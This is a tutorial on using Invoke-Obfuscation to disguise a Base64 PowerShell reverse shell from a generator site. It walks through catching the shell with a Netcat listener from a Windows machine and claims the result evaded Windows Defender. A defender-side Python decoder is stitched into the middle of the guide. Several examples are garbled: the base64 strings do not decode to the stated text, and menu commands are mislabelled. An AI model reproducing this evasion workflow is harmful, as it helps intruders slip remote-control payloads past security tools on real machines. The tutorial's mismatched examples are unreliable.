An Easy Guide to Obfuscating PowerShell Scripts with Invoke-Obfuscation
In cybersecurity, obfuscation is used to hide scripts from detection and analysis. Obfuscation means making code hard to understand: renaming variables, changing the structure of the code, and other techniques that make it difficult for an analyst or a security product to understand or detect the script. Invoke-Obfuscation is a free tool that applies these techniques to PowerShell code to make it harder to detect and analyze. This guide explains how to use Invoke-Obfuscation. This guide is for educational purposes only.
Step 1: Check each machine's IP address
1. Find the IP address of each machine:
Kali Linux: ip a
Windows 10: ipconfig
2. Verify the connection between the machines using the ping command:
· Ping from Windows 10 to Kali Linux should work.
· Ping from Kali Linux to Windows 10 might fail because of the Windows firewall.
Step 2: Installing PowerShell on Kali Linux
1. Update the system:
sudo apt update
2. Install PowerShell:
sudo apt install -y powershell
Step 3: Downloading Invoke-Obfuscation from GitHub
git clone https://github.com/danielbohannon/Invoke-Obfuscation.git
Step 4: Prepare Invoke-Obfuscation
1. List the folder content:
ls
2. Navigate to the downloaded project directory:
cd Invoke-Obfuscation
3. Set permissions:
chmod 777 *
Note that the module files only need to be readable for Import-Module to load them; chmod 777 also makes every file world-writable, which is more than the tool requires.
Step 5: Running PowerShell and Loading the Script
1. Change to the root user:
sudo su
2. Start PowerShell:
pwsh
3. Check the current execution policy:
Get-ExecutionPolicy
· If the output is "Unrestricted", you can run and obfuscate PowerShell scripts with Invoke-Obfuscation without encountering execution-policy issues. (On Linux, pwsh always reports Unrestricted, because execution policy is only enforced on Windows.)
4. List the folder content:
ls
5. Import the Invoke-Obfuscation module:
Import-Module ./Invoke-Obfuscation.psd1
6. Run the Invoke-Obfuscation module:
Invoke-Obfuscation
7. View module options (equivalent to help):
tutorials
8. Usage guide for Invoke-Obfuscation:
1. Load a script block (SET SCRIPTBLOCK) or a script path/URL (SET SCRIPTPATH):
SET SCRIPTBLOCK Write-Host "This is my test command" -ForegroundColor Green
2. Navigate through the obfuscation menus:
- Yellow options enable obfuscation.
- Use BACK/CD .. to return to the previous menu and HOME/MAIN to return to the main menu.
- For example, enter ENCODING and then 5 to apply SecureString obfuscation.
3. Test the obfuscated command locally:
- Enter SHOW to view the current obfuscated command.
4. Copy the obfuscated command to your clipboard:
- Enter OUT to write the obfuscated command to disk.
5. Reset to remove all obfuscations and start over:
- Enter UNDO to undo the last obfuscation.
- Enter HELP/? for the help menu.
Step 6: Choosing a Reverse Shell and Testing Obfuscation
1. On the Kali machine, open a web browser and go to the Reverse Shell Generator website:
https://www.revshells.com
2. At the top left there is an IP & Port field:
Enter the attacker's (Kali) IP address and choose the port the listener will use.
3. At the bottom there is a tab menu of payload types (this guide uses the Reverse tab):
· Reverse:
A reverse shell is a shell where the target machine connects back to the attacker's machine, allowing the attacker to control the target system. This method is useful when the target machine is behind a firewall or NAT, which makes a direct connection difficult.
· Bind:
In a bind shell, the target machine opens a specific port and listens for incoming connections from the attacker. The attacker then connects to this port to control the target machine. This method can be less stealthy than a reverse shell, because it requires the target to have an open port.
· MSFVenom:
A tool used to generate payloads for the Metasploit Framework. MSFVenom can create various payload types, including reverse and bind shells, and customize them for different platforms and architectures, so the generated payloads are compatible with Metasploit.
· HoaxShell:
HoaxShell is used to simulate a shell for testing purposes or to deceive an attacker. It can mimic the behavior of a real shell but is designed to log activities or redirect commands for analysis without giving the attacker full control.
4. OS menu:
Under the payload menu there is an option to choose the target operating system.
Leave it on the default option: All
5. Shell payload scripts:
Under the OS selector there is a drop-down menu of the reverse shell payload scripts available in the Reverse Shell Generator.
This guide uses: PowerShell#3 (Base64)
PowerShell Base64 Reverse Shell: this technique encodes the PowerShell script in Base64 to obfuscate the command and make it less likely to be detected by security software.
· When this option is chosen, a window shows a Base64-encoded PowerShell command designed to run a reverse shell. The encoded command can be executed on a target machine to establish a connection back to the attacker's machine.
6. Copy the generated script with the Copy button in the bottom right corner.
7. Return to the Kali terminal tab running Invoke-Obfuscation and load the script block (SET SCRIPTBLOCK) from the Reverse Shell Generator:
set scriptblock <copied script>
Press Enter.
· After it finishes, press Enter. If loading is successful, the tool displays the message:
Successfully set ScriptBlock
Step 7: Obfuscation Options in Invoke-Obfuscation
1. Select: AST
The main menu offers the following obfuscation options:
· TOKEN:
Obfuscates PowerShell commands using tokens.
- Example:
Write-Host "Hello, World!"
Can become:
(&{wri`te-h`os`t} "Hello, World!")
· AST:
Obfuscates nodes of the AST in PowerShell (PS 5.0).
- Example:
Write-Host "Hello, World!"
Can be transformed into a different AST structure that yields the same result but looks entirely different from the original code.
· STRING:
Obfuscates the entire command as a string.
- Example:
Write-Host "Hello, World!"
Can become:
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("VwByAGkAdABlAC0ASABvAHMAdAAgACIAUgBlAGwAbwBsAGkAawBtIgA="))
· ENCODING:
Obfuscates the entire command using encoding.
- Example:
Write-Host "Hello, World!"
Can become:
powershell -e "VwByAGkAdABlAC0ASABvAHMAdAAgACIAUgBlAGwAbwBsAGkAawBtIgA="
· COMPRESS:
Converts the entire command to a one-liner and compresses it.
- Example:
Write-Host "Hello, World!"
Can become:
$z="Hello, World!";Write-Host $z
· LAUNCHER:
Obfuscates command parameters using launcher techniques.
- Example:
Write-Host "Hello, World!"
Can become:
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "Write-Host 'Hello, World!'"
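As a defender-side example added here (not part of this guide and not Invoke-Obfuscation's own code), the following Python normalizer peels the ENCODING (-e <base64>) and STRING (FromBase64String) layers shown above and strips TOKEN-style backticks, so a command line captured in process-creation logs can be read and checked for launcher flags such as -W Hidden. The sample command lines are constructed inline; `is_encoded_flag`, `peel` and `analyze` are this example's own names, and the indicator list is an assumption rather than a complete detection rule.

```python
import base64
import re
# Strings a reviewer of process-creation logs would look for once a layer has been peeled.
INDICATORS = ("-w hidden", "-nop", "-exec bypass", "frombase64string", "iex", "invoke-expression", "net.sockets.tcpclient")
B64_CALL = re.compile(r"FromBase64String\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)", re.I)  # STRING layer above

def is_encoded_flag(tok):
    t = tok.lstrip("-/").lower()  # powershell.exe accepts any unambiguous prefix of -EncodedCommand
    return bool(t) and "encodedcommand".startswith(t)

def decode_utf16_b64(blob):
    try:  # -EncodedCommand and ::Unicode.GetString both take base64 of UTF-16LE text
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def strip_ticks(script):
    """Drop backticks outside double-quoted strings (wri`te-h`os`t -> write-host); keep `n, `t, `" inside them."""
    out, in_dq, prev = [], False, ""
    for ch in script:
        if ch == '"' and prev != "`":
            in_dq = not in_dq
        if ch != "`" or in_dq:
            out.append(ch)
        prev = ch
    return "".join(out)

def peel(cmdline):
    """Split a logged command line into (launcher flags, decoded and de-ticked script)."""
    parts, launcher, script = cmdline.split(), cmdline.split(), cmdline
    for i in range(len(parts) - 1):  # ENCODING layer: -e <base64>
        decoded = decode_utf16_b64(parts[i + 1]) if is_encoded_flag(parts[i]) else None
        if decoded is not None:
            launcher, script = parts[:i] + parts[i + 2:], decoded
            break
    m = B64_CALL.search(script)  # STRING layer: FromBase64String("...") inside the script
    script = (m and decode_utf16_b64(m.group(1))) or script
    return " ".join(launcher), strip_ticks(script)

def analyze(cmdline):
    """Report the peeled script plus every indicator seen in the launcher flags or the script."""
    launcher, script = peel(cmdline)
    haystack = (launcher + " " + script).lower()
    return {"launcher": launcher, "script": script, "indicators": [i for i in INDICATORS if i in haystack]}

# Constructed sample log lines (not from the page), wrapping the TOKEN form shown above.
INNER = '(&{wri`te-h`os`t} "Hello, World!")'
B64 = base64.b64encode(INNER.encode("utf-16-le")).decode("ascii")
SAMPLE_ENCODED = "powershell -NoP -NonI -W Hidden -Exec Bypass -e " + B64
SAMPLE_STRING = "iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('" + B64 + "')))"
```

Running analyze(SAMPLE_ENCODED) returns the de-ticked `(&{write-host} "Hello, World!")` together with the launcher flags that should draw attention in a log review; only one layer of each kind is peeled, so nested output from the tool may need the function applied again.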
2. Apply all obfuscation techniques:
Select: ALL
· This option is suitable when you want to make the code as hard to understand and analyze as possible.
· The tool will apply all possible obfuscation techniques to the current code structure.
- NamedAttributeArgumentAst: Obfuscates Nodes of type NamedAttributeArgumentAst.
- ParamBlockAst: Obfuscates Nodes of type ParamBlockAst.
- ScriptBlockAst: Obfuscates Nodes of type ScriptBlockAst.
- AttributeAst: Obfuscates Nodes of type AttributeAst.
- BinaryExpressionAst: Obfuscates Nodes of type BinaryExpressionAst.
- HashtableAst: Obfuscates Nodes of type HashtableAst.
- CommandAst: Obfuscates Nodes of type CommandAst.
- AssignmentStatementAst: Obfuscates Nodes of type AssignmentStatementAst.
- TypeExpressionAst: Obfuscates Nodes of type TypeExpressionAst.
- TypeConstraintAst: Obfuscates Nodes of type TypeConstraintAst.
- ALL: Selects all of the above options for maximum obfuscation.
3. Choose one of the AST\All options below to apply to the current payload:
Select: 1
The output reports that Invoke-Obfuscation\AST\All was executed.
4. Testing:
test
The output shows the obfuscated command being invoked. The error message appears because the script is a reverse shell between two machines and we have not executed it yet, only tested it.
Step 8: Final Steps
1. Set up a Netcat listener:
Open a new terminal window in Kali and run:
nc -lvnp 9001
nc: Short for Netcat, a networking utility for reading from and writing to network connections using TCP or UDP.
-l: Tells Netcat to listen for an incoming connection rather than initiating a connection to a remote host.
-v: Enables verbose mode, providing detailed output about the connection process.
-n: Prevents Netcat from doing DNS lookups on IP addresses, which speeds up the connection process.
-p 9001: Specifies the port number (9001) on which Netcat should listen for incoming connections.
2. In the Invoke-Obfuscation window on the Kali machine, copy the obfuscated script.
3. Open PowerShell on the Windows machine and paste the obfuscated script.
In the Kali terminal on the right, a connection from the Windows machine appears, which allows reverse shell communication.
4. Verify the connection to the Windows machine by typing at the Kali terminal:
dir
The code bypassed Windows Defender and connected the attacker to the Windows machine.
Conclusion
By following this guide, you can use Invoke-Obfuscation to hide your PowerShell scripts. This makes them more secure and helps you learn how to handle real-world obfuscation. This guide is for learning only. Using these techniques for bad purposes is illegal and wrong. Always get permission before using any cybersecurity tools or methods.
Invoke-Obfuscation offers various methods to make your scripts difficult to read and analyze. Whether you’re using it for educational purposes or in a professional setting, understanding these techniques can enhance your cybersecurity skills and knowledge. Practicing with these tools in a controlled environment can prepare you for real-world scenarios, ensuring you are well-equipped to secure your systems and networks.